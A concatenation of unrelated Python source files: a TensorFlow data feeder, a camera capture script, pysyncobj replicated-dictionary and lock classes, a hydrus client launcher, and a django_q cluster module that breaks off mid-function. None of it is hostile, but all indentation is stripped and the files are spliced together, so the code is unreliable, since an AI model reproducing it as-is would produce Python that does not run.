inputs_batch = [tf.concat(0, inps) for inps in zip(*inputs_batch)]
targets_batch = [tf.concat(0, trgts) for trgts in zip(*targets_batch)]
else:
inputs_batch = inputs_batch[0]
targets_batch = targets_batch[0]
return inputs_batch, targets_batch
def request_stop(self):
pass
def join(self):
pass
def start_feeder(self, sess):
pass
class Dataset(object):
def __init__(self, init=True):
if init:
self._input_info = OrderedDict()
self._target_info = OrderedDict()
self.n_samples = None
def input_info(self):
return self._input_info.copy()
def target_info(self):
return self._target_info.copy()
def num_samples(self):
assert self.n_samples is not None, 'Dataset has to define self.n_samples'
return self.n_samples
def add_input(self, name, dtype='float32', shape=()):
assert name not in self._input_info.keys() + self._target_info.keys()
self._input_info[name] = {'dtype': dtype, 'shape': shape}
def add_target(self, name, dtype='int32', shape=()):
assert name not in self._input_info.keys() + self._target_info.keys()
self._target_info[name] = {'dtype': dtype, 'shape': shape}
class DataGenerator(Dataset):
"""
This class provides a template for the loaders used with TFFeeder
"""
def __init__(self, shuffle, batch_size=64, reinit_dataset=True):
Dataset.__init__(self, init=reinit_dataset)
self.shuffle = shuffle
self.batch_size = batch_size
def start_feeder(self):
# Do nothing
pass
def loop(self):
raise NotImplementedError
def batch_loop(self):
raise NotImplementedError
def get_sample(self, index):
raise NotImplementedError
class CompleteDataGenerator(DataGenerator):
"""
Instance of DataGenerator for complete datasets
(i.e. that can be completely loaded into numpy arrays)
"""
def __init__(self, inputs, targets, shuffle=True, batch_size=64):
DataGenerator.__init__(self, shuffle, batch_size)
if isinstance(inputs, np.ndarray):
inputs = [inputs]
if isinstance(inputs, list):
inputs = {'X:%d' % i: inputs[i] for i in xrange(len(inputs))}
if isinstance(targets, np.ndarray):
targets = [targets]
if isinstance(targets, list):
targets = {'Y:%d' % i: targets[i] for i in xrange(len(targets))}
for key, val in inputs.iteritems():
self.add_input(key, val.dtype.name, tuple(val.shape[1:]))
for key, val in targets.iteritems():
self.add_target(key, val.dtype.name, tuple(val.shape[1:]))
self.inputs = inputs
self.targets = targets
self.n_samples = self.inputs.values()[0].shape[0]
def loop(self):
from itertools import cycle
order = np.arange(self.n_samples)
if self.shuffle:
np.random.shuffle(order)
for item in cycle(order):
inputs = {key: val[item] for key, val in self.inputs.items()}
targets = {key: val[item] for key, val in self.targets.items()}
yield inputs, targets
def batch_loop(self):
from itertools import cycle
order = np.arange(self.n_samples)
if self.shuffle:
np.random.shuffle(order)
batch_lims = [(i, i+self.batch_size) for i in xrange(0, self.n_samples, self.batch_size)]
for lims in cycle(batch_lims):
inputs = {key: val[lims[0]:lims[1]] for key, val in self.inputs.items()}
targets = {key: val[lims[0]:lims[1]] for key, val in self.targets.items()}
yield inputs, targets
def get_sample(self, index):
inputs = {key: val[index] for key, val in self.inputs.items()}
targets = {key: val[index] for key, val in self.targets.items()}
return inputs, targets
class MultiProcessWrapper(DataGenerator):
"""
A python class that manages a donkey and feeder to fetch python datalib samples
Works as a wrapper for a DataGenerator
"""
def __init__(self, dataset, n_donkey=4):
DataGenerator.__init__(self, dataset.shuffle, dataset.batch_size)
self.dataset = dataset
self.n_donkey = n_donkey
self.n_samples = dataset.num_samples()
self._input_info = dataset.input_info()
self._target_info = dataset.target_info()
self.donkey = Donkey(f=self.get_sample, n_proc=n_donkey)
self._feeder = None
def _random_ind_list(self):
if self.shuffle:
ind_list = np.random.permutation(self.n_samples)
else:
ind_list = xrange(self.n_samples)
return ind_list
def start_feeder(self, coord=None):
'''
a infinite feeder which generates job list every epoch
then submit job to donkeys
:return:
'''
def feed(coord=None):
while True:
self.ind_list = self._random_ind_list()
for ind in self.ind_list:
if coord is not None:
if coord.should_stop():
break
self.donkey.add_job((ind, ))
self._feeder = threading.Thread(target=feed, args=(coord,))
self._feeder.daemon = True
self._feeder.start()
return self._feeder
def loop(self):
'''
a infite loop which retrieves samples from donkeys
'''
while True:
yield self.donkey.q_out.get()
def batch_loop(self):
'''
a infite loop which accumulates samples from loop() to form batches
'''
inputs, targets, n = {}, {}, 0
for inp, trg in self.loop():
# Memory initialization
for key in self._input_info.keys():
if key not in inputs.keys():
inputs[key] = np.zeros((self.batch_size,)+inp[key].shape, dtype=inp[key].dtype)
inputs[key][n] = inp[key]
for key in self._target_info.keys():
if key not in targets.keys():
targets[key] = np.zeros((self.batch_size,)+trg[key].shape, dtype=trg[key].dtype)
targets[key][n] = trg[key]
n += 1
if n == self.batch_size:
yield inputs, targets
n = 0
def get_sample(self, idx):
return self.dataset.get_sample(idx)
# Auxiliary donkey function
def fun(f, var_dict, q_in, q_out, coord=None):
while True:
if coord is not None:
if coord.should_stop():
break
x = q_in.get()
if x is None:
break
if var_dict is not None:
if not isinstance(x, tuple):
x = (x, )
x = (var_dict, ) + x
res = f(*x)
q_out.put(res)
class Donkey(object):
def __init__(self, n_proc=8, f=None, var_dict=None):
self.q_in = multiprocessing.Queue(1)
self.q_out = multiprocessing.Queue(n_proc*25)
self.n_proc = n_proc
self.f = f
assert (isinstance(var_dict, (list,tuple)) and len(var_dict)==n_proc) or isinstance(var_dict, dict)
if not isinstance(var_dict, (list,tuple)):
self.var_dict = [var_dict for _ in range(n_proc)]
self.workers = [multiprocessing.Process(target=fun, args=(self.f, self.var_dict[i], self.q_in, self.q_out)) for i in xrange(n_proc)]
for p in self.workers:
p.daemon = True
p.start()
def add_job(self, args):
self.q_in.put(args)
def stop(self):
[self.q_in.put((None)) for _ in range(self.n_proc)]
[p.join() for p in self.workers]
def test_enqueue():
from datalib.daquar.TFDataGenerator import DaquarDtGen
import time
daquar = DaquarDtGen(full=True, single_answer=False, features={'cnn': 'VGG19', 'layer': 'fc7'}, train=True, batch_size=128)
#daquar = MultiProcessWrapper(dataset=daquar, n_donkey=8)
tf_feeder = PythonFeeder(dataset=daquar, batch_size=512, n_feeders=2, queue=tf.RandomShuffleQueue)
with tf.Session(config=tf.ConfigProto(intra_op_parallelism_threads=2, gpu_options=tf.GPUOptions(allow_growth=True))) as sess:
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(sess=sess, coord=coord)
tf_feeder.start_feeder(sess=sess)
a = 0
while True:
a += np.random.rand()
pass
tf_feeder.request_stop()
tf_feeder.join()
coord.request_stop()
coord.join(threads)
def test_donkey():
def do_job():
return np.zeros((1, 120, 1024))
import time
donkey = Donkey(10, do_job)
t1 = time.time()
for i in range(4):
t = time.time()
donkey.add_job()
print('addjob', time.time()-t)
for i in range(4):
print(donkey.q_out.get().shape)
print(time.time()-t1)
if __name__ == '__main__':
# test_donkey()
test_enqueue()
# test_batcher()
|
imgacq.py
|
from simple_pyspin import Camera
import time
from PIL import Image
import os
from multiprocessing import Process
def image_capture(duration):
global fps
# duration = int(input('enter duration')) #dev purposes only
if 0 < duration <= 5:
fps = 30
if 5 < duration <= 10:
fps = 30
if 10 < duration <= 15:
fps = 30
if 15 < duration <= 20:
fps = 31
if 20 < duration <= 30:
fps = 32
if duration > 30:
fps = 25
print(fps)
num_frames = int(duration * fps)
# Make a directory to save some images
output_dir = 'test_images'
if not os.path.exists(output_dir):
os.makedirs(output_dir)
with Camera() as cam:
# If this is a color camera, request the data in RGB format.
if 'Bayer' in cam.PixelFormat:
cam.PixelFormat = "RGB8"
# Get images from the full sensor
cam.OffsetX = 0
cam.OffsetY = 0
cam.Width = cam.SensorWidth
cam.Height = cam.SensorHeight
# cam.AcquisitionFrameRateAuto = 'Off'
# cam.AcquisitionFrameRateEnabled = True
# cam.AcquisitionFrameRate = 32
print('Opened camera: %s (#%s)' % (cam.DeviceModelName, cam.DeviceSerialNumber))
print('Recording...')
# Start recording
cam.start()
start = time.time()
# print(start)
for a in range(num_frames):
imgs = [cam.get_array() for n in range(1)]
for n, img in enumerate(imgs):
Image.fromarray(img).save(os.path.join(output_dir, '%08d.jpg' % a))
# Stop recording
el = time.time() - start
# print('el is', el)
cam.stop()
print('Acquired %d images in %.2f s (~ %.1f fps)' % (num_frames, el, num_frames / el))
# print('Acquired %d images in %.2f s (~ %.1f fps)' % (len(img), el, len(img) / el))
# Make a directory to save some images
# output_dir = 'test_images'
# if not os.path.exists(output_dir):
# os.makedirs(output_dir)
# print('Saving to "%s"' % output_dir)
# Save them
# for n, img in enumerate(imgs):
# Image.fromarray(img).save(os.path.join(output_dir, '%08d.jpg' % n))
return start
p1 = Process(target=image_capture)
p1.start()
p1.join()
|
batteries.py
|
from __future__ import print_function
import hashlib
import os
import socket
import threading
import time
import weakref
from collections import Mapping
from typing import ValuesView, ItemsView
import dill
from pysyncobj import replicated, SyncObjConsumer
from pysyncobj.batteries import ReplDict
class ReplEventDict(ReplDict):
def __init__(self, on_set=None):
self.on_set = on_set
super(ReplEventDict, self).__init__()
@replicated
def set(self, key, value):
super().set(key, value, _doApply=True)
if self.on_set is not None:
self.on_set(key, value)
#
# Replicated Code Store with versioning
# ex usage:
# obj.inc_version()
# obj.set("/a", pickle.dumps(lambda: 1))
# obj.set("/b", pickle.dumps(lambda: 2))
# obj.commit()
# obj.inc_version()
# obj.set("/a", pickle.dumps(lambda: 3))
# obj.commit()
# v = obj.get("/a")
# v() expect ==> 3
# with obj:
# obj.set("/a", pickle.dumps(lambda: 1))
# obj.set("/b", pickle.dumps(lambda: 2))
#
# get:
# obj['/']
# obj.get("/")
# TODO: grab a lock for commit transaction otherwise a separate process can
class ReplVersionedDict(SyncObjConsumer, Mapping):
def __init__(self, on_head_change=None):
self.on_head_change = on_head_change
super(ReplVersionedDict, self).__init__()
self.__objects = {}
self.__references = {}
self.__version = None
self.__head = None
self.__len_cache = {}
def clear(self):
self.__objects = {}
self.__references = {}
self.__version = None
self.__head = None
self.__len_cache = {}
def __getitem__(self, k):
x = self.get(k)
if x is None:
raise KeyError(k)
return x
def __len__(self):
version = self.get_head()
if version in self.__len_cache:
return self.__len_cache[version]
x = sum([1 for arr in self.__references.values() if self.__floor_to_version(arr, version) is not None])
self.__len_cache[version] = x
return x
# https://docs.python.org/3/reference/datamodel.html#object.__iter__
def __iter__(self):
return self.keys()
# TODO: create ItemsView
def items(self) -> ItemsView:
version = self.get_head()
for key, arr in self.__references.items():
v = self.__floor_to_version(arr, version)
if v is not None:
yield key, self.__get_obj(v)
# TODO: create ValuesView
def values(self) -> ValuesView:
version = self.get_head()
for key, arr in self.__references.items():
v = self.__floor_to_version(arr, version)
if v is not None:
yield self.__get_obj(v)
def __contains__(self, o: object) -> bool:
return self.get(o) is not None
@replicated
def delete(self, key):
self.__delitem__(key, _doApply=True)
@replicated
def __delitem__(self, key):
# put a tombstone into the end of the array so that it's ignored in __floor_to_version
self.set(key, None, _doApply=True)
# https://stackoverflow.com/questions/42366856/keysview-valuesview-and-itemsview-default-representation-of-a-mapping-subclass
# TODO: impelement KeysView so it works over BaseManager
def keys(self, version=None):
version = version or self.get_head()
all_keys = []
for key, arr in self.__references.items():
v = self.__floor_to_version(arr, version)
if v is not None:
all_keys.append(key)
return all_keys.__iter__()
@staticmethod
def __hash_obj(value):
m = hashlib.sha256()
m.update(value)
return m.digest()
def __store_obj(self, value):
data = dill.dumps(value)
key = self.__hash_obj(data)
self.__objects[key] = data
return key
def __get_obj(self, key):
obj = self.__objects.get(key)
return dill.loads(obj) if obj is not None else None
def __inc_version(self):
self.__version = 0 if self.__version is None else self.__version + 1
return self.__version
def get_max_version(self):
return self.__version
@replicated
def set_head(self, version=None):
if self.__version is None:
if version is not None:
# raise RuntimeError("no prior transactions")
return
else:
if version is None:
version = self.__version
self.__head = min(version, self.__version)
if self.on_head_change is not None:
self.on_head_change(self.__head)
def get_head(self):
return self.__version if self.__head is None else self.__head
@replicated
def update(self, other):
self.__inc_version()
for k in other:
self.__set(k, other[k])
self.set_head(version=None, _doApply=True)
@staticmethod
def __floor_to_version(arr, version):
for i in reversed(range(len(arr))):
v = arr[i][0]
if v <= version:
return arr[i][1]
return None
def get(self, key):
version = self.get_head()
arr = self.__references.get(key)
if arr is not None:
v = self.__floor_to_version(arr, version)
if v is not None:
return self.__get_obj(v)
return None
def __set(self, key, value):
obj_key = self.__store_obj(value) if value is not None else None
arr = self.__references.get(key)
if arr is None:
arr = []
arr.append((self.__version, obj_key))
self.__references[key] = arr
@replicated
def set(self, key, value):
self.update({key: value}, _doApply=True)
@replicated
def flatten(self):
pass
class ReplTaskManager(SyncObjConsumer):
def __init__(self, kvstore, task_manager):
self.kvstore = kvstore
self.task_manager = task_manager
super(ReplTaskManager, self).__init__()
# TODO: we should provide another way to store results as replicated actions would all store into the same key
@replicated
def apply(self, src, *args, **kwargs):
return self.task_manager.apply(src, *args, **kwargs)
# Similar to _ReplLockManagerImpl but supports data bound to the lock
# TODO: can this be done with a lock and the dict?
class _ReplLockDataManagerImpl(SyncObjConsumer):
def __init__(self, autoUnlockTime):
super(_ReplLockDataManagerImpl, self).__init__()
self.__locks = {}
self.__autoUnlockTime = autoUnlockTime
@replicated
def acquire(self, lockID, clientID, currentTime, data=None):
existingLock = self.__locks.get(lockID, None)
# Auto-unlock old lock
if existingLock is not None:
if currentTime - existingLock[1] > self.__autoUnlockTime:
existingLock = None
# Acquire lock if possible
if existingLock is None or existingLock[0] == clientID:
self.__locks[lockID] = (clientID, currentTime, data)
return True
# Lock already acquired by someone else
return False
@replicated
def prolongate(self, clientID, currentTime):
for lockID in list(self.__locks):
lockClientID, lockTime, lockData = self.__locks[lockID]
if currentTime - lockTime > self.__autoUnlockTime:
del self.__locks[lockID]
continue
if lockClientID == clientID:
self.__locks[lockID] = (lockClientID, currentTime, lockData)
@replicated
def release(self, lockID, clientID):
existingLock = self.__locks.get(lockID, None)
if existingLock is not None and existingLock[0] == clientID:
del self.__locks[lockID]
def isAcquired(self, lockID, clientID, currentTime):
existingLock = self.__locks.get(lockID, None)
if existingLock is not None:
if existingLock[0] == clientID:
if currentTime - existingLock[1] < self.__autoUnlockTime:
return True
return False
def isOwned(self, lockID, currentTime):
existingLock = self.__locks.get(lockID, None)
if existingLock is not None:
if currentTime - existingLock[1] < self.__autoUnlockTime:
return True
return False
def lockData(self, lockID=None):
if lockID is None:
return {k: self.__locks[k][2] for k in self.__locks.keys()}
existingLock = self.__locks.get(lockID)
if existingLock is not None:
return {lockID: existingLock}
class ReplLockDataManager(object):
def __init__(self, autoUnlockTime, selfID=None):
"""Replicated Lock Manager. Allow to acquire / release distributed locks.
:param autoUnlockTime: lock will be released automatically
if no response from holder for more than autoUnlockTime seconds
:type autoUnlockTime: float
:param selfID: (optional) - unique id of current lock holder.
:type selfID: str
"""
self.__lockImpl = _ReplLockDataManagerImpl(autoUnlockTime)
if selfID is None:
selfID = '%s:%d:%d' % (socket.gethostname(), os.getpid(), id(self))
self.__selfID = selfID
self.__autoUnlockTime = autoUnlockTime
self.__mainThread = threading.current_thread()
self.__initialised = threading.Event()
self.__destroying = False
self.__lastProlongateTime = 0
self.__thread = threading.Thread(target=ReplLockDataManager._autoAcquireThread, args=(weakref.proxy(self),))
self.__thread.start()
while not self.__initialised.is_set():
pass
def _consumer(self):
return self.__lockImpl
def destroy(self):
"""Destroy should be called before destroying ReplLockManager"""
self.__destroying = True
def _autoAcquireThread(self):
self.__initialised.set()
try:
while True:
if not self.__mainThread.is_alive():
break
if self.__destroying:
break
time.sleep(0.1)
if time.time() - self.__lastProlongateTime < float(self.__autoUnlockTime) / 4.0:
continue
syncObj = self.__lockImpl._syncObj
if syncObj is None:
continue
if syncObj._getLeader() is not None:
self.__lastProlongateTime = time.time()
self.__lockImpl.prolongate(self.__selfID, time.time())
except ReferenceError:
pass
def tryAcquire(self, lockID, data=None, callback=None, sync=False, timeout=None):
"""Attempt to acquire lock.
:param lockID: unique lock identifier.
:type lockID: str
:param sync: True - to wait until lock is acquired or failed to acquire.
:type sync: bool
:param callback: if sync is False - callback will be called with operation result.
:type callback: func(opResult, error)
:param timeout: max operation time (default - unlimited)
:type timeout: float
:return True if acquired, False - somebody else already acquired lock
"""
attemptTime = time.time()
if sync:
acquireRes = self.__lockImpl.acquire(lockID, self.__selfID, attemptTime, data=data, callback=callback, sync=sync, timeout=timeout)
acquireTime = time.time()
if acquireRes:
if acquireTime - attemptTime > self.__autoUnlockTime / 2.0:
acquireRes = False
self.__lockImpl.release(lockID, self.__selfID, sync=sync)
return acquireRes
def asyncCallback(acquireRes, errCode):
if acquireRes:
acquireTime = time.time()
if acquireTime - attemptTime > self.__autoUnlockTime / 2.0:
acquireRes = False
self.__lockImpl.release(lockID, self.__selfID, sync=False)
callback(acquireRes, errCode)
self.__lockImpl.acquire(lockID, self.__selfID, attemptTime, callback=asyncCallback, sync=sync, timeout=timeout)
def isAcquired(self, lockID):
"""Check if lock is acquired by ourselves.
:param lockID: unique lock identifier.
:type lockID: str
:return True if lock is acquired by ourselves.
"""
return self.__lockImpl.isAcquired(lockID, self.__selfID, time.time())
def isOwned(self, lockID):
return self.__lockImpl.isOwned(lockID, time.time())
def lockData(self, lockID=None):
return self.__lockImpl.lockData(lockID=lockID)
def release(self, lockID, callback=None, sync=False, timeout=None):
"""
Release previously-acquired lock.
:param lockID: unique lock identifier.
:type lockID: str
:param sync: True - to wait until lock is released or failed to release.
:type sync: bool
:param callback: if sync is False - callback will be called with operation result.
:type callback: func(opResult, error)
:param timeout: max operation time (default - unlimited)
:type timeout: float
"""
self.__lockImpl.release(lockID, self.__selfID, callback=callback, sync=sync, timeout=timeout)
|
client.py
|
#!/usr/bin/env python2
# This program is free software. It comes without any warranty, to
# the extent permitted by applicable law. You can redistribute it
# and/or modify it under the terms of the Do What The Fuck You Want
# To Public License, Version 2, as published by Sam Hocevar. See
# http://sam.zoy.org/wtfpl/COPYING for more details.
try:
from include import HydrusExceptions
from include import HydrusConstants as HC
from include import HydrusData
from include import HydrusPaths
import os
import sys
import time
from include import ClientController
import threading
from include import HydrusGlobals as HG
from include import HydrusLogger
import traceback
try:
from twisted.internet import reactor
except:
HG.twisted_is_broke = True
#
import argparse
argparser = argparse.ArgumentParser( description = 'hydrus network client (console)' )
argparser.add_argument( '-d', '--db_dir', help = 'set an external db location' )
argparser.add_argument( '--no_daemons', action='store_true', help = 'run without background daemons' )
argparser.add_argument( '--no_wal', action='store_true', help = 'run without WAL db journalling' )
result = argparser.parse_args()
if result.db_dir is None:
db_dir = HC.DEFAULT_DB_DIR
if not HydrusPaths.DirectoryIsWritable( db_dir ):
db_dir = os.path.join( os.path.expanduser( '~' ), 'Hydrus' )
else:
db_dir = result.db_dir
db_dir = HydrusPaths.ConvertPortablePathToAbsPath( db_dir, HC.BASE_DIR )
try:
HydrusPaths.MakeSureDirectoryExists( db_dir )
except:
raise Exception( 'Could not ensure db path ' + db_dir + ' exists! Check the location is correct and that you have permission to write to it!' )
no_daemons = result.no_daemons
no_wal = result.no_wal
#
with HydrusLogger.HydrusLogger( db_dir, 'client' ) as logger:
try:
HydrusData.Print( 'hydrus client started' )
threading.Thread( target = reactor.run, kwargs = { 'installSignalHandlers' : 0 } ).start()
controller = ClientController.Controller( db_dir, no_daemons, no_wal )
controller.Run()
except:
HydrusData.Print( 'hydrus client failed' )
HydrusData.Print( traceback.format_exc() )
finally:
HG.view_shutdown = True
HG.model_shutdown = True
try:
controller.pubimmediate( 'wake_daemons' )
except:
HydrusData.Print( traceback.format_exc() )
reactor.callFromThread( reactor.stop )
HydrusData.Print( 'hydrus client shut down' )
HG.shutdown_complete = True
if HG.restart:
HydrusData.RestartProcess()
except Exception as e:
import traceback
import os
print( traceback.format_exc() )
if 'db_dir' in locals() and os.path.exists( db_dir ):
dest_path = os.path.join( db_dir, 'crash.log' )
with open( dest_path, 'wb' ) as f:
f.write( traceback.format_exc() )
print( 'Critical error occured! Details written to crash.log!' )
|
cluster.py
|
# Future
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
# Standard
import importlib
import signal
import socket
import ast
from time import sleep
from multiprocessing import Event, Process, Value, current_process
# external
import arrow
# Django
from django.utils import timezone
from django.utils.translation import ugettext_lazy as _
from django import db
# Local
from django_q import tasks
from django_q.compat import range
from django_q.conf import Conf, logger, psutil, get_ppid, error_reporter, rollbar
from django_q.models import Task, Success, Schedule
from django_q.signing import SignedPackage, BadSignature
from django_q.status import Stat, Status
from django_q.brokers import get_broker
from django_q.signals import pre_execute
from django_q.queues import Queue
class Cluster(object):
def __init__(self, broker=None):
self.broker = broker or get_broker()
self.sentinel = None
self.stop_event = None
self.start_event = None
self.pid = current_process().pid
self.host = socket.gethostname()
self.timeout = Conf.TIMEOUT
signal.signal(signal.SIGTERM, self.sig_handler)
signal.signal(signal.SIGINT, self.sig_handler)
def start(self):
# Start Sentinel
self.stop_event = Event()
self.start_event = Event()
self.sentinel = Process(target=Sentinel,
args=(self.stop_event, self.start_event, self.broker, self.timeout))
self.sentinel.start()
logger.info(_('Q Cluster-{} starting.').format(self.pid))
while not self.start_event.is_set():
sleep(0.1)
return self.pid
def stop(self):
if not self.sentinel.is_alive():
return False
logger.info(_('Q Cluster-{} stopping.').format(self.pid))
self.stop_event.set()
self.sentinel.join()
logger.info(_('Q Cluster-{} has stopped.').format(self.pid))
self.start_event = None
self.stop_event = None
return True
def sig_handler(self, signum, frame):
logger.debug(_('{} got signal {}').format(current_process().name,
Conf.SIGNAL_NAMES.get(signum, 'UNKNOWN')))
self.stop()
@property
def stat(self):
if self.sentinel:
return Stat.get(self.pid)
return Status(self.pid)
@property
def is_starting(self):
return self.stop_event and self.start_event and not self.start_event.is_set()
@property
def is_running(self):
return self.stop_event and self.start_event and self.start_event.is_set()
@property
def is_stopping(self):
return self.stop_event and self.start_event and self.start_event.is_set() and self.stop_event.is_set()
@property
def has_stopped(self):
return self.start_event is None and self.stop_event is None and self.sentinel
class Sentinel(object):
def __init__(self, stop_event, start_event, broker=None, timeout=Conf.TIMEOUT, start=True):
# Make sure we catch signals for the pool
signal.signal(signal.SIGINT, signal.SIG_IGN)
signal.signal(signal.SIGTERM, signal.SIG_DFL)
self.pid = current_process().pid
self.parent_pid = get_ppid()
self.name = current_process().name
self.broker = broker or get_broker()
self.reincarnations = 0
self.tob = timezone.now()
self.stop_event = stop_event
self.start_event = start_event
self.pool_size = Conf.WORKERS
self.pool = []
self.timeout = timeout
self.task_queue = Queue(maxsize=Conf.QUEUE_LIMIT) if Conf.QUEUE_LIMIT else Queue()
self.result_queue = Queue()
self.event_out = Event()
self.monitor = None
self.pusher = None
if start:
self.start()
def start(self):
self.broker.ping()
self.spawn_cluster()
self.guard()
def status(self):
if not self.start_event.is_set() and not self.stop_event.is_set():
return Conf.STARTING
elif self.start_event.is_set() and not self.stop_event.is_set():
if self.result_queue.empty() and self.task_queue.empty():
return Conf.IDLE
return Conf.WORKING
elif self.stop_event.is_set() and self.start_event.is_set():
if self.monitor.is_alive() or self.pusher.is_alive() or len(self.pool) > 0:
return Conf.STOPPING
return Conf.STOPPED
def spawn_process(self, target, *args):
"""
:type target: function or class
"""
p = Process(target=target, args=args)
p.daemon = True
if target == worker:
p.daemon = Conf.DAEMONIZE_WORKERS
p.timer = args[2]
self.pool.append(p)
p.start()
return p
def spawn_pusher(self):
return self.spawn_process(pusher, self.task_queue, self.event_out, self.broker)
def spawn_worker(self):
self.spawn_process(worker, self.task_queue, self.result_queue, Value('f', -1), self.timeout)
def spawn_monitor(self):
return self.spawn_process(monitor, self.result_queue, self.broker)
def reincarnate(self, process):
"""
:param process: the process to reincarnate
:type process: Process or None
"""
db.connections.close_all() # Close any old connections
if process == self.monitor:
self.monitor = self.spawn_monitor()
logger.error(_("reincarnated monitor {} after sudden death").format(process.name))
elif process == self.pusher:
self.pusher = self.spawn_pusher()
logger.error(_("reincarnated pusher {} after sudden death").format(process.name))
else:
self.pool.remove(process)
self.spawn_worker()
if self.timeout and int(process.timer.value) == 0:
# only need to terminate on timeout, otherwise we risk destabilizing the queues
process.terminate()
logger.warn(_("reincarnated worker {} after timeout").format(process.name))
elif int(process.timer.value) == -2:
logger.info(_("recycled worker {}").format(process.name))
else:
logger.error(_("reincarnated worker {} after death").format(process.name))
self.reincarnations += 1
def spawn_cluster(self):
self.pool = []
Stat(self).save()
db.connection.close()
# spawn worker pool
for __ in range(self.pool_size):
self.spawn_worker()
# spawn auxiliary
self.monitor = self.spawn_monitor()
self.pusher = self.spawn_pusher()
# set worker cpu affinity if needed
if psutil and Conf.CPU_AFFINITY:
set_cpu_affinity(Conf.CPU_AFFINITY, [w.pid for w in self.pool])
def guard(self):
logger.info(_('{} guarding cluster at {}').format(current_process().name, self.pid))
self.start_event.set()
Stat(self).save()
logger.info(_('Q Cluster-{} running.').format(self.parent_pid))
scheduler(broker=self.broker)
counter = 0
cycle = Conf.GUARD_CYCLE # guard loop sleep in seconds
# Guard loop. Runs at least once
while not self.stop_event.is_set() or not counter:
# Check Workers
for p in self.pool:
# Are you alive?
if not p.is_alive() or (self.timeout and p.timer.value == 0):
self.reincarnate(p)
continue
# Decrement timer if work is being done
if self.timeout and p.timer.value > 0:
p.timer.value -= cycle
# Check Monitor
if not self.monitor.is_alive():
self.reincarnate(self.monitor)
# Check Pusher
if not self.pusher.is_alive():
self.reincarnate(self.pusher)
# Call scheduler once a minute (or so)
counter += cycle
if counter >= 30 and Conf.SCHEDULER:
counter = 0
scheduler(broker=self.broker)
# Save current status
Stat(self).save()
sleep(cycle)
self.stop()
def stop(self):
Stat(self).save()
name = current_process().name
logger.info(_('{} stopping cluster processes').format(name))
# Stopping pusher
self.event_out.set()
# Wait for it to stop
while self.pusher.is_alive():
sleep(0.1)
Stat(self).save()
# Put poison pills in the queue
for __ in range(len(self.pool)):
self.task_queue.put('STOP')
self.task_queue.close()
# wait for the task queue to empty
self.task_queue.join_thread()
# Wait for all the workers to exit
while len(self.pool):
for p in self.pool:
if not p.is_alive():
self.pool.remove(p)
sleep(0.1)
Stat(self).save()
# Finally stop the monitor
self.result_queue.put('STOP')
self.result_queue.close()
# Wait for the result queue to empty
self.result_queue.join_thread()
logger.info(_('{} waiting for the monitor.').format(name))
# Wait for everything to close or time out
count = 0
if not self.timeout:
self.timeout = 30
while self.status() == Conf.STOPPING and count < self.timeout * 10:
sleep(0.1)
Stat(self).save()
count += 1
# Final status
Stat(self).save()
def pusher(task_queue, event, broker=None):
"""
Pulls tasks of the broker and puts them in the task queue
:type task_queue: multiprocessing.Queue
:type event: multiprocessing.Event
"""
if not broker:
broker = get_broker()
logger.info(_('{} pushing tasks at {}').format(current_process().name, current_process().pid))
while True:
try:
task_set = broker.dequeue()
except Exception as e:
logger.error(e)
# broker probably crashed. Let the sentinel handle it.
sleep(10)
break
if task_set:
for task in task_set:
ack_id = task[0]
# unpack the task
try:
task = SignedPackage.loads(task[1])
except (TypeError, BadSignature) as e:
logger.error(e)
broker.fail(ack_id)
continue
task['ack_id'] = ack_id
task_queue.put(task)
logger.debug(_('queueing from {}').format(broker.list_key))
if event.is_set():
break
logger.info(_("{} stopped pushing tasks").format(current_process().name))
def monitor(result_queue, broker=None):
"""
Gets finished tasks from the result queue and saves them to Django
:type result_queue: multiprocessing.Queue
"""
if not broker:
broker = get_broker()
name = current_process().name
logger.info(_("{} monitoring at {}").format(name, current_process().pid))
for task in iter(result_queue.get, 'STOP'):
# save the result
if task.get('cached', False):
save_cached(task, broker)
else:
save_task(task, broker)
# acknowledge result
ack_id = task.pop('ack_id', False)
if ack_id and (task['success'] or task.get('ack_failure', False)):
broker.acknowledge(ack_id)
# log the result
if task['success']:
# log success
logger.info(_("Processed [{}]").format(task['name']))
else:
# log failure
logger.error(_("Failed [{}] - {}").format(task['name'], task['result']))
logger.info(_("{} stopped monitoring results").format(name))
def worker(task_queue, result_queue, timer, timeout=Conf.TIMEOUT):
"""
Takes a task from the task queue, tries to execute it and puts the result back in the result queue
:type task_queue: multiprocessing.Queue
:type result_queue: multiprocessing.Queue
:type timer: multiprocessing.Value
"""
name = current_process().name
logger.info(_('{} ready for work at {}').format(name, current_process().pid))
task_count = 0
# Start reading the task queue
for task in iter(task_queue.get, 'STOP'):
result = None
timer.value = -1 # Idle
task_count += 1
# Get the function from the task
logger.info(_('{} processing [{}]').format(name, task['name']))
f = task['func']
# if it's not an instance try to get it from the string
if not callable(f):
try:
module, func = f.rsplit('.', 1)
m = importlib.import_module(module)
f = getattr(m, func)
except (ValueError, ImportError, AttributeError) as e:
result = (e, False)
if error_reporter:
error_reporter.report()
if rollbar:
rollbar.report_exc_info()
# We're still going
if not result:
db.close_old_connections()
timer_value = task['kwargs'].pop('timeout', timeout or 0)
# signal execution
pre_execute.send(sender="django_q", func=f, task=task)
# execute the payload
timer.value = timer_value # Busy
try:
res = f(*task['args'], **task['kwargs'])
result = (res, True)
except Exception as e:
result = ('{}'.format(e), False)
if error_reporter:
error_reporter.report()
if rollbar:
rollbar.report_exc_info()
# Process result
task['result'] = result[0]
task['success'] = result[1]
task['stopped'] = timezone.now()
result_queue.put(task)
timer.value = -1 # Idle
# Recycle
if task_count == Conf.RECYCLE:
timer.value = -2 # Recycled
break
logger.info(_('{} stopped doing work').format(name))
def save_task(task, broker):
"""
Saves the task package to Django or the cache
"""
# SAVE LIMIT < 0 : Don't save success
if not task.get('save', Conf.SAVE_LIMIT >= 0) and task['success']:
return
# async next in a chain
if task.get('chain', None):
tasks.async_chain(task['chain'], group=task['group'], cached=task['cached'], sync=task['sync'], broker=broker)
# SAVE LIMIT > 0: Prune database, SAVE_LIMIT 0: No pruning
db.close_old_connections()
try:
if task['success'] and 0 < Conf.SAVE_LIMIT <= Success.objects.count():
Success.objects.last().delete()
# check if this task has previous results
if Task.objects.filter(id=task['id'], name=task['name']).exists():
existing_task = Task.objects.get(id=task['id'], name=task['name'])
# only update the result if it hasn't succeeded yet
if not existing_task.success:
existing_task.stopped = task['stopped']
existing_task.result = task['result']
existing_task.success = task['success']
existing_task.save()
else:
Task.objects.create(id=task['id'],
